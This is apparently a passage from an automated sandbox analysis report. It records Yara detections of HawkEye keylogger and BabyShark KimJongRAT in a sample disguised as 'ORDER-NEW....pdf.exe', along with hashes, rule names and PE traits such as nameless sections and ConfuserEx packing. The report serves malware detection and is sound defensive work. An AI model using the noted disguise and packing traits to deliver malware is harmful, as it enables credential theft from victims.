              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ORDER-NEW....pdf.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040F078 OpenClipboard,GetLastError,DeleteFileW,8_2_0040F078

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 18.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 18.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 18.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 18.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 18.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 18.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.2.AppLaunch.exe.7f31990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.2.AppLaunch.exe.9480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.2.AppLaunch.exe.94d834a.4.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.2.AppLaunch.exe.9480000.3.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 5.3.AppLaunch.exe.875dbda.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 5.2.AppLaunch.exe.7f31990.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 18.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 5.2.AppLaunch.exe.7e95950.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.2.AppLaunch.exe.9480345.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 18.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.2.AppLaunch.exe.94d834a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 18.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.3.AppLaunch.exe.8705890.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 5.3.AppLaunch.exe.875dbda.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 18.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.3.AppLaunch.exe.8705bd5.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 5.3.AppLaunch.exe.8705890.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
              Source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000012.00000000.842827239.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000012.00000000.843631196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: Process Memory Space: ORDER-NEW....pdf.exe PID: 6860, type: MEMORYSTRMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTRMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: ORDER-NEW....pdf.exe
              Source: initial sampleStatic PE information: Filename: ORDER-NEW....pdf.exe
              PE file has nameless sections
              Source: ORDER-NEW....pdf.exeStatic PE information: section name:
              PE file contains section with special chars
              Source: ORDER-NEW....pdf.exeStatic PE information: section name: )xrUhX
              Source: ORDER-NEW....pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 18.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 18.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 18.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 18.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
